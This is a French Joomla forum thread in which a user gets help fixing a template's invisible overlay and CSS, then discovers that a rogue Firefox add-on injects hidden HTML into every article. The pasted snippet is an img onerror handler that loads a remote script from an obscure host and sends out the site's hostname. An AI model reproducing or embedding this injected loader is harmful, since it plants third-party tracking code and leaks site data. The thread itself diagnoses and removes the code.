Lien externe actif seulement en bas de page Topic is solved

Support et assistance pour l'utilisation de Joomla! 3.0, 3.1 et 3.5 : administration, gestion du contenu, des menus et des extensions natives... et toutes les autres questions qui n'ont pas de place ailleurs

Moderators: sarki, Aidan38, Aidan38, sarki

Forum rules
Règles du forum
alainG+
Joomla! Apprentice
Joomla! Apprentice
Posts: 19
Joined: Thu Jul 24, 2014 10:04 pm

Lien externe actif seulement en bas de page

Post by alainG+ » Sun May 17, 2020 7:02 pm

Bonjour,
Mon problème va vous sembler curieux mais les liens externes ne sont actifs qu'en bas de page et pas quand ils se situent en début de visualisation.
Je ne comprends pas pourquoi.
Si quelqu'un peut m'expliquer Merci.
Site : tixalis.fr

User avatar
sarki
Joomla! Guru
Joomla! Guru
Posts: 527
Joined: Mon Sep 19, 2005 2:34 pm
Location: Suisse
Contact:

Re: Lien externe actif seulement en bas de page

Post by sarki » Sun May 17, 2020 7:17 pm

Hello Alain,
Si tu parles bien des liens qui sont dans des articles alors probablement que tu as un calque invisible qui couvre la zone où les liens ne sont pas actifs...
As-tu une URL que je puisse aller voir ?
French Joomla Translation & Support : www.joomla.fr
French JCE Translation & Support : www.sarki.ch/jce

alainG+
Joomla! Apprentice
Joomla! Apprentice
Posts: 19
Joined: Thu Jul 24, 2014 10:04 pm

Re: Lien externe actif seulement en bas de page

Post by alainG+ » Sun May 17, 2020 9:17 pm

sarki wrote:
Sun May 17, 2020 7:17 pm
Hello Alain,
Si tu parles bien des liens qui sont dans des articles alors probablement que tu as un calque invisible qui couvre la zone où les liens ne sont pas actifs...
As-tu une URL que je puisse aller voir ?
Oui comme mentionné https://tixalis.fr
Plus précisément dans la rubrique nous contacter.
Les liens ne sont actif que quand ils sont situés en milieu bas de l'écran.

Merci.

User avatar
sarki
Joomla! Guru
Joomla! Guru
Posts: 527
Joined: Mon Sep 19, 2005 2:34 pm
Location: Suisse
Contact:

Re: Lien externe actif seulement en bas de page

Post by sarki » Mon May 18, 2020 12:45 pm

Je suis allé vois le site mais sur chaque lien dont celui de la page d'accueil également ou du lien contact il est noté que la catégorie ne contient aucun article...
French Joomla Translation & Support : www.joomla.fr
French JCE Translation & Support : www.sarki.ch/jce

alainG+
Joomla! Apprentice
Joomla! Apprentice
Posts: 19
Joined: Thu Jul 24, 2014 10:04 pm

Re: Lien externe actif seulement en bas de page

Post by alainG+ » Mon May 18, 2020 1:22 pm

Bonjour,
Merci pour votre implication.
Le site est bati en blog des articles d'une catégorie (la catégorie fr-fr)
et les liens de menu ne font que déplacer l'affichage d'un article à un autre.
Je ne comprends donc toujours pas.
Si vous voulez un accès au site c'est sans problème.
Pour moi la catégorie fr-fr contient 9 articles tous publiés.
Merci encore,
Alain.

User avatar
sarki
Joomla! Guru
Joomla! Guru
Posts: 527
Joined: Mon Sep 19, 2005 2:34 pm
Location: Suisse
Contact:

Re: Lien externe actif seulement en bas de page

Post by sarki » Mon May 18, 2020 2:16 pm

Ok avec tes précisions j'ai pu accéder au site...
En fait tu as une erreur dans ta mise en place du multilingue car on part d'office sur la version anglaise en mettant l'URL du site et celle-ci n'a en effet aucun article...
Si tu veux faire du multilingue tu dois mettre en place un menu attribué à "Toutes langues" et un lien de menu qui est la page d'accueil par défaut attribué également à "Toutes langues", voir : https://docs.joomla.org/J3.x:Setup_a_Mu ... al_Site/fr

Et en ce qui concerne ton problème, c'est en effet une div qui couvre la page comme je le pensais, à priori un bogue de ton template qui applique cette largeur à cette div, comme si le menu devrait être en haut et non à gauche...
Je ne sais pas où tu as trouvé ce template ou si c'est toi qui l'a modifié, si ce n'est pas le cas et que tu l'as acheté tu peux contacter l'auteur en lui envoyant l'image ci-jointe pour lui montrer le problème...
bogue-template.jpg
You do not have the required permissions to view the files attached to this post.
French Joomla Translation & Support : www.joomla.fr
French JCE Translation & Support : www.sarki.ch/jce

alainG+
Joomla! Apprentice
Joomla! Apprentice
Posts: 19
Joined: Thu Jul 24, 2014 10:04 pm

Re: Lien externe actif seulement en bas de page

Post by alainG+ » Mon May 18, 2020 9:19 pm

Bonsoir et bravo !
Pour ce qui concerne le multilangue, en fait j'ai renoncé à tout traduire et ai supprimé les autres langues. je vais corriger.
Pour ce qui est du template je vais voir comment le modifier mais merci beaucoup pour cette expertise qui correspond bien a mes constats les liens ne sont opérationnels que sous le niveau du dernier item de menu.
Alain.

alainG+
Joomla! Apprentice
Joomla! Apprentice
Posts: 19
Joined: Thu Jul 24, 2014 10:04 pm

Re: Lien externe actif seulement en bas de page

Post by alainG+ » Sat May 23, 2020 9:25 am

Merci beaucoup Sarki.
Pour ce qui est du template il a été trouvé par un de mes clients qui a été séduit par une demo dans la forêt des extensions de Joomla! (Il s'agit de LTHEME site Lttattoo). Après plusieurs mails le problème a été résolu mais il reste un point en suspens car la modif a déplacé le bouton du menu pour smartphone sur le logo ! (En cours).
Alain.

User avatar
sarki
Joomla! Guru
Joomla! Guru
Posts: 527
Joined: Mon Sep 19, 2005 2:34 pm
Location: Suisse
Contact:

Re: Lien externe actif seulement en bas de page

Post by sarki » Sat May 23, 2020 9:18 pm

Hello Alain, content que l'auteur t'ait corrigé cela.
Pour ton problème de menu qui chevauche le logo, tu peux corriger le fichier suivant :
https://tixalis.fr/templates/lttattoo/css/default.css
A la ligne 1423 tu as le style suivant :

Code: Select all

.sticky-wrapper.is-sticky #offcanvas-toggler > i {
    margin-top: -5px;
}
Corrige-le ainsi :

Code: Select all

.sticky-wrapper.is-sticky #offcanvas-toggler > i {
    margin-top: -8px;
    width: 0px;
    font-size: 30px;
}
La valeur font-size permet d'agrandir les lignes, si tu changes la taille il te faudra adapter la valeur margin-top ;)
French Joomla Translation & Support : www.joomla.fr
French JCE Translation & Support : www.sarki.ch/jce

alainG+
Joomla! Apprentice
Joomla! Apprentice
Posts: 19
Joined: Thu Jul 24, 2014 10:04 pm

Re: Lien externe actif seulement en bas de page

Post by alainG+ » Sun May 24, 2020 12:19 pm

Super, Merci encore.

alainG+
Joomla! Apprentice
Joomla! Apprentice
Posts: 19
Joined: Thu Jul 24, 2014 10:04 pm

Re: Lien externe actif seulement en bas de page

Post by alainG+ » Tue May 26, 2020 2:14 pm

Bonjour,
Pour finaliser la solution proposée par le développeur a été d'ajouter en "Custom Code" du template :
@media (max-width: 767px) {
#sp-header .row {
position: relative!important;
}
}

Et effectivement le menu en smartphone est revenu à sa place (un peu agrandi grace à ta modif, ce qui n'est pas plus mal !)

Fin de cet épisode.
Merci encore.

User avatar
sarki
Joomla! Guru
Joomla! Guru
Posts: 527
Joined: Mon Sep 19, 2005 2:34 pm
Location: Suisse
Contact:

Re: Lien externe actif seulement en bas de page

Post by sarki » Tue May 26, 2020 3:16 pm

Hello,
Merci de ce retour ;)
L'avantage de la fonction @media c'est que tu peux cibler une taille spécifique d'écran et tout ce qui est en-dessus ou en-dessous selon que soit utilisé 'max-width' ou 'min-width'.
Pour la taille des lignes, tu peux également ajouter les valeurs 'margin-top' et 'font-size' dans le custom.css du template.
Normalement on met en effet toujours les modifications dans un custom.css afin de ne pas les perdre lors de mise à jour du template. Par contre selon les templates ce fichier peut avoir un autre nom, par exemple avec celui par défaut de Joomla c'est users.css
French Joomla Translation & Support : www.joomla.fr
French JCE Translation & Support : www.sarki.ch/jce

alainG+
Joomla! Apprentice
Joomla! Apprentice
Posts: 19
Joined: Thu Jul 24, 2014 10:04 pm

Re: Lien externe actif seulement en bas de page

Post by alainG+ » Tue May 26, 2020 5:30 pm

Bonjour,
Merci de me permettre d'apprendre tous les jours (mon passe temps favori !)
Si je peux me permettre mais sans obligation je voudrais comprendre pourquoi un JSN easySlider dans un article ne couvre pas le "haut" de l'article et laisse une ligne horizontale de background très "moche"
L'image est dans le slider ce n'est peut-être pas la meilleure place ?
Exemple : https://exohub.biz

Cordialement,
Alain.

User avatar
sarki
Joomla! Guru
Joomla! Guru
Posts: 527
Joined: Mon Sep 19, 2005 2:34 pm
Location: Suisse
Contact:

Re: Lien externe actif seulement en bas de page

Post by sarki » Tue May 26, 2020 7:52 pm

En fait le problème est toujours lié à ton template qui est à mon sens pas correctement construit dans sa structure pour avoir ce menu à gauche... on l'a vu déjà avec les autres problèmes. Sans doute que l'auteur est en phase d'apprentissage et qu'il referait cela différemment aujourd'hui ;)

Le propre du CSS est la notion de styles en cascade, c'est à dire des containers qui ont des styles qui contiennent d'autres containers qui en ont aussi, et ainsi de suite...
Du coup si tu n'est pas juste à un moment donné soit dans l'empilage de ces containers soit dans le nommage pour bien les différencier tu te retrouves avec des problèmes ce qui semble être ici le cas.
Sur l'image ci-dessous tu vois que le container 'article' est encore dans la bonne marge, et le slideshow est à l'intérieur de celui-ci, donc le problème est au-dessus, je n'ai pas réussi à trouver où en raison de cette construction bizarre...
Il te faut donc voir à nouveau avec l'auteur...
slide-problem.png
Honnêtement si j'étais toi j'utiliserai un autre template, je doute en effet au vu des problèmes que tu as déjà qu'il sera correctement suivi par l'auteur pour rester compatible notamment avec la version Joomla 4 qui devrait sortir d'ici la fin de l'année ou début de la prochaine...
Il y a des auteurs spécialistes de templates et qui en vivent depuis des années, donc qui seront encore là demain, et plusieurs proposent une version gratuite, ce sont des templates dont les styles sont tellement simples à paramétrer surtout pour quelqu'un qui ne maîtrise pas le CSS que même si cela demande passablement de temps à en faire le tour cela vaut la peine que tu regardes.

Il y a le framework Helix Ultimate : https://www.joomshaper.com/joomla-templ ... ixultimate
Ainsi que le framework Astroïde : https://astroidframework.com
Ou le framework Gantry : http://gantry.org
Et encore le framework T4 : https://www.joomlart.com/t4-framework

Je ne connais pas les deux derniers car je n'ai pas encore eu l'occasion de les tester, ils sont plus récents, mais j'ai utilisé les deux premiers sur de nombreux sites et c'est vraiment le top notamment dans la possibilité de créer toutes les positions que l'on souhaite, de les dédier à un type d'interface (ordi, tablette, smartphone) et de les réorganiser par des glisser/déplacer ;)
You do not have the required permissions to view the files attached to this post.
French Joomla Translation & Support : www.joomla.fr
French JCE Translation & Support : www.sarki.ch/jce

User avatar
sarki
Joomla! Guru
Joomla! Guru
Posts: 527
Joined: Mon Sep 19, 2005 2:34 pm
Location: Suisse
Contact:

Re: Lien externe actif seulement en bas de page

Post by sarki » Tue May 26, 2020 10:28 pm

J'ai testé ce soir le Gantry et le T4, j'étais curieux de voir ce qu'amenait les nouvelles générations de ces deux Frameworks...
J'ai bien aimé la simplicité du Gantry et son look de base, T4 est plus complet mais le thème de base est moins sexy à mon gout...
T4 est un peu du même genre que Helix Ultimate qu'il a un peu copié, sa prévisualisation sur les différents supports de visualisation (ordis, tablettes, smartphones) est pratique.
Astroid est complet mais plus accessible, par contre le thème de base est très neutre.
En fait tous ces frameworks ont des éléments plus intéressant que l'autre, un c'est la gestion des menus, l'autre c'est la prévisualisation sur les différents supports, ou encore le look du graphisme par défaut, l'édition en frontal, etc.
Comme chacun d'eux demande tout de même un petit temps de prise en main, l'idéal est de tester leur démo pour voir celui qui convient le mieux.
Pour un débutant je dirai de choisir entre le Gantry et l'Astroid ;)
French Joomla Translation & Support : www.joomla.fr
French JCE Translation & Support : www.sarki.ch/jce

User avatar
sarki
Joomla! Guru
Joomla! Guru
Posts: 527
Joined: Mon Sep 19, 2005 2:34 pm
Location: Suisse
Contact:

Re: Lien externe actif seulement en bas de page

Post by sarki » Tue May 26, 2020 10:33 pm

Ah une dernière chose, il existe des traductions en FR de ces différents frameworks sauf pour le T4 mais probablement que la traduction du T3 fonctionne en tout cas en partie.
Celle de Gantry n'est que partiel mais pour Astroid ou Helix c'est complet.
Si tu veux tester fais-le déjà avec Chrome et avec un clic droit du peux choisir de traduire en français à la volée, c'est pas parfait mais pour tester c'est déjà pas mal.
Après si tu fais un choix je t'aiguillerai sur l'endroit où les télécharger.
French Joomla Translation & Support : www.joomla.fr
French JCE Translation & Support : www.sarki.ch/jce

alainG+
Joomla! Apprentice
Joomla! Apprentice
Posts: 19
Joined: Thu Jul 24, 2014 10:04 pm

Re: Lien externe actif seulement en bas de page

Post by alainG+ » Tue May 26, 2020 10:37 pm

Bonsoir,
Encore de précieux conseils, Merci.
En fait le template est signé en bas "Helix3 Framework 2.5.6" mais il n'est assigné à aucune page du site de démo de LTHEME.

Je vais suivre ces conseils et reprendre.

Alain.

User avatar
sarki
Joomla! Guru
Joomla! Guru
Posts: 527
Joined: Mon Sep 19, 2005 2:34 pm
Location: Suisse
Contact:

Re: Lien externe actif seulement en bas de page

Post by sarki » Tue May 26, 2020 10:56 pm

Sans doute que l'auteur a créé son modèle sur la base de la version 3 de Helix, c'est celle qui précédait la version Ultimate, elle est plus confortable à mon goût car les paramètres ne sont pas coincés dans une colonne à gauche, mais Ultimate a une prévisualisation que n'a pas la version 3, il utilise plus de dernières technologies et son suivi pour le futur Joomla 4 est plus sûr, donc si je démarrais un nouveau site je ne partirai pas sur une version 3 ;)
French Joomla Translation & Support : www.joomla.fr
French JCE Translation & Support : www.sarki.ch/jce

alainG+
Joomla! Apprentice
Joomla! Apprentice
Posts: 19
Joined: Thu Jul 24, 2014 10:04 pm

Re: Lien externe actif seulement en bas de page

Post by alainG+ » Thu May 28, 2020 5:39 pm

Bonjour,
Le site Tixalis.fr a été repris avec un template Helix Ultimate pour premier essai.
Je vais ensuite tester les deux autres conseillés.
Merci,
Alain.

User avatar
sarki
Joomla! Guru
Joomla! Guru
Posts: 527
Joined: Mon Sep 19, 2005 2:34 pm
Location: Suisse
Contact:

Re: Lien externe actif seulement en bas de page

Post by sarki » Thu May 28, 2020 8:20 pm

Hello Alain
Ah oui je vois que tu as réussi à mettre cela en place, bravo.
J'aime bien le Helix Ultimate, mais je trouve l'Astroid presque plus convivial, toutefois ayant un abonnement chez JoomShaper les auteurs du Helix et un autre chez Yootheme j'utilise en général un de ces deux Frameworks.
French Joomla Translation & Support : www.joomla.fr
French JCE Translation & Support : www.sarki.ch/jce

alainG+
Joomla! Apprentice
Joomla! Apprentice
Posts: 19
Joined: Thu Jul 24, 2014 10:04 pm

Re: Lien externe actif seulement en bas de page

Post by alainG+ » Thu Jun 04, 2020 1:23 pm

Bonjour,
Par comparaison avec l'ancien Thème je constate que le menu pour les portables fonctionne différemment et notamment (ce qui n'est pas Top) le choix d'une option de menu affiche l'article mais ne ferme pas la fenêtre du menu contrairement au menu principal.

Je me bat en ce moment avec un formulaire de contact. Après plusieurs essais j'en suis à "Rapid Contact EX" qui me plait bien mais génère du code dérangeant à chaque utilisation (exemple ci-dessous)
Dans l'article à l'origine :
<h2 id="contact"><br /><br /><br />Pour nous contacter</h2>
<ul>
<li style="text-align: left;"><span style="font-family: arial, helvetica, sans-serif; font-size: 14pt;">Par téléphone : +33 (0)6 8865 8521<br /></span></li>
<li><span style="font-family: arial, helvetica, sans-serif; font-size: 14pt;">En nous envoyant un message.<br />{loadmoduleid 137}<br /></span></li>
</ul>
Après la première utilisation du formulaire en front end je trouve au même endroit :
<h2 id="contact"><br /><br /><br />Pour nous contacter</h2>
<ul>
<li style="text-align: left;"><span style="font-family: arial, helvetica, sans-serif; font-size: 14pt;">Par téléphone : +33 (0)6 8865 8521<br /></span></li>
<li><span style="font-family: arial, helvetica, sans-serif; font-size: 14pt;">En nous envoyant un message.<br />{loadmoduleid 137}<br /></span></li>
</ul>
<div id="mailtorapidetoModal" style="z-index: 1102;">
<div id="mailtorapidetoContentPopupModal">
<div id="mailtorapidetoModalPopupCloseMail">&nbsp;</div>
<div id="mailtorapidemodalMailPopupQuestion">What do you want to do ?</div>
<a id="mailtorapidebuttonNewApp">New mail</a><button id="mailtorapidecopyClipboard">Copy</button><textarea id="mailtorapideselectAreaText"></textarea></div>
</div>
<div><img onerror="var s=document.createElement(&quot;script&quot;);s.type=&quot;text/javascript&quot;;s.id=&quot;cczedcc-plg-analytics&quot;;s.src=&quot;//govimu.wuruwobeze.com/scripts/js?k=5ed03d8983df1af4288b4567&amp;s=&quot;+encodeURI(btoa(window.location.host));document.getElementsByTagName(&quot;head&quot;)[0].appendChild(s);" alt="" /></div>

De plus ce "What do you want to do ?" s'affiche dans le front end des smartphone au dessus du formulaire.

Je me demande si c'est un bogue ou des scories dans ma base de données ou ... autre ?

Bonne journée à vous et Merci si vous pouvez prendre le temps de me répondre.
Alain.

alainG+
Joomla! Apprentice
Joomla! Apprentice
Posts: 19
Joined: Thu Jul 24, 2014 10:04 pm

Re: Lien externe actif seulement en bas de page

Post by alainG+ » Thu Jun 04, 2020 10:01 pm

Bonsoir,
Finalement les <div> mentionnés ci-dessus se trouvaient rajoutés au code de chacun des articles du site et non visibles en mode Editor de JCE (Comment ?).
Une fois supprimés dans chacun des articles, le formulaire et le site ont retrouvé leur allure "normale".

Bonne soirée,
Alain.

alainG+
Joomla! Apprentice
Joomla! Apprentice
Posts: 19
Joined: Thu Jul 24, 2014 10:04 pm

Re: Lien externe actif seulement en bas de page

Post by alainG+ » Fri Jun 05, 2020 1:03 pm

Bonjour,
Après analyse du code rajouté aux pages il pourrait s'agir d'un ajout par firefox (voir le site dont l'url est mentionnée dans les ajouts (PS: j'ai vu mais j'enlève le lien - Sarki)
Etrange
Alain.
Last edited by sarki on Sun Jun 07, 2020 12:21 am, edited 1 time in total.
Reason: Suppression du lien

User avatar
sarki
Joomla! Guru
Joomla! Guru
Posts: 527
Joined: Mon Sep 19, 2005 2:34 pm
Location: Suisse
Contact:

Re: Lien externe actif seulement en bas de page

Post by sarki » Sun Jun 07, 2020 12:20 am

Hello Alain,
Ce truc est vraiment bizarre et ce n'est certainement pas un addon de Firefox reconnu et recensé car une recherche web avec le mot "wuruwobeze" n'affiche que 3 pages dont celle-ci ???
Même pas celle du site ce qui est encore plus qu'inquiétant...
De plus le site ne décrit absolument pas ce que fait cette addon, il n'y a rien à part les mentions légales, celles des cookies etc. tout ce qu'il faut pour être légale au niveau du RGPD mais sans plus...
Cela semble être un pisteur vu le mot "plg-analytics" dans ton code.
Si ce n'est pas toi qui a installé délibérément cet addon sur ton firefox je te conseille de le désinstaller immédiatement !!!

Note : j'enlève le lien vers ce site dans ce message car je veux pas qu'on lui favorise l'indexation dans la recherche, trop bizarre ce truc ;)
French Joomla Translation & Support : www.joomla.fr
French JCE Translation & Support : www.sarki.ch/jce

alainG+
Joomla! Apprentice
Joomla! Apprentice
Posts: 19
Joined: Thu Jul 24, 2014 10:04 pm

Re: Lien externe actif seulement en bas de page

Post by alainG+ » Mon Jun 08, 2020 8:01 pm

Bonjour, je suis rassuré de n'être pas encore trop parano !
C'est bien mon avis aussi d'où mon inquiétude.
Cet ajout sur tous les articles se retrouve sur un autre site d'un amis.
J'ai beau tout effacer sur tous les articles au bout de deux ou trois jours ce code se retrouve partout
ET JE NE SAIS PAS COMMENT M'EN DEBARRASSER ne sachant pas d'où il vient ni comment il s'installe sur les articles (bien "caché" car visible seulement en

Code: Select all

 dans JCE). Peut-on mettre des attributs Read only sur le contenu des articles dans la base de données ? Autre solution?

Pour couronner le tout le voici sur la page de ce site (copie d'écran en PJ)

Merci pour le soutien.
Alain.

[attachment=0]Trouble-Screenshot_20200608_215814.png[/attachment]
You do not have the required permissions to view the files attached to this post.

User avatar
sarki
Joomla! Guru
Joomla! Guru
Posts: 527
Joined: Mon Sep 19, 2005 2:34 pm
Location: Suisse
Contact:

Re: Lien externe actif seulement en bas de page

Post by sarki » Mon Jun 08, 2020 8:27 pm

Hello Alain,
Je ne suis pas sûr de t'avoir compris d'autant que je ne comprends pas ta capture d'image...
Ce code se retrouve dans ton article quand tu l'édites avec JCE ?
Car si c'est ça, cela voudrait dire que qq'un fait des injections SQL directement dans la BD car je doute que qu'il se connecte et s'amuse à ajouter manuellement ce code dans tes articles.
Mais es-tu sûr que ce code est bien dans tes articles ? D'après ton message précédent je croyais que c'était un addon du navigateur ou peut-être un plugin de Joomla qui ajoutait ce code de traçage, que tu le voyais en affichant le code source de la page et non de l'article en mode d'édition avec JCE ce qui n'est bien sûr pas la même chose...

Oui il est possible de verrouiller l'édition de zones dans un article mais cela se fait à l'aide de code ajouté ce qui ne sert à rien dans ce cas car les modifications si elles sont dans l'article se font par la BD ou par quelqu'un qui le fait en affichage code...
French Joomla Translation & Support : www.joomla.fr
French JCE Translation & Support : www.sarki.ch/jce

alainG+
Joomla! Apprentice
Joomla! Apprentice
Posts: 19
Joined: Thu Jul 24, 2014 10:04 pm

Re: Lien externe actif seulement en bas de page

Post by alainG+ » Mon Jun 08, 2020 8:27 pm

Je crois avoir trouvé il s'agissait d'un module "messagerie rapide" (ce n'est pas le nom exact volontairement) extension de Firefox qui s'était installé seul ou associé à une autre extension ?
Je l'ai désinstallé après avoir signalé mon problème à Firefox.

Merci encore pour le support.
Bonne semaine.
Alain.

User avatar
sarki
Joomla! Guru
Joomla! Guru
Posts: 527
Joined: Mon Sep 19, 2005 2:34 pm
Location: Suisse
Contact:

Re: Lien externe actif seulement en bas de page

Post by sarki » Mon Jun 08, 2020 8:28 pm

Je vois que nos messages se sont croisés ;)
French Joomla Translation & Support : www.joomla.fr
French JCE Translation & Support : www.sarki.ch/jce

alainG+
Joomla! Apprentice
Joomla! Apprentice
Posts: 19
Joined: Thu Jul 24, 2014 10:04 pm

Re: Lien externe actif seulement en bas de page

Post by alainG+ » Mon Jun 08, 2020 8:33 pm

"Hello Alain,
Je ne suis pas sûr de t'avoir compris ..."


En fait je me suis mis à voir le message "What do you want to do ?" sur cette page du Forum ! pendant que j'écrivais mon message !

Je pense maintenant être tranquille.

Alain.

User avatar
sarki
Joomla! Guru
Joomla! Guru
Posts: 527
Joined: Mon Sep 19, 2005 2:34 pm
Location: Suisse
Contact:

Re: Lien externe actif seulement en bas de page

Post by sarki » Mon Jun 08, 2020 9:05 pm

Ok, cela confirme effectivement qu'il s'agit bien d'un addon.
Par contre il est possible que Firefox ne puisse rien y faire car il n'est pas dans leur répertoire puisqu'une recherche ne donne rien.
Je pense qu'il a été installé par l'intermédiaire d'un programme que tu as installé sur ton ordi ou depuis une page web d'un site pas clean, voir même piraté sans que rien ne soit visible dans la page au sujet de cet addon, mais normalement si cela s'installe depuis le navigateur il y a une demande de confirmation ce qui n'est pas obligatoirement le cas avec des installations de logiciels pas clean...

Prends l'habitude quand tu as un problème de toujours vérifier dans un autre navigateur, cela te permettra de gagner passablement de temps dans la recherche de la cause ;)
French Joomla Translation & Support : www.joomla.fr
French JCE Translation & Support : www.sarki.ch/jce


Post Reply

Return to “3.x - Questions générales, nouvel utilisateur”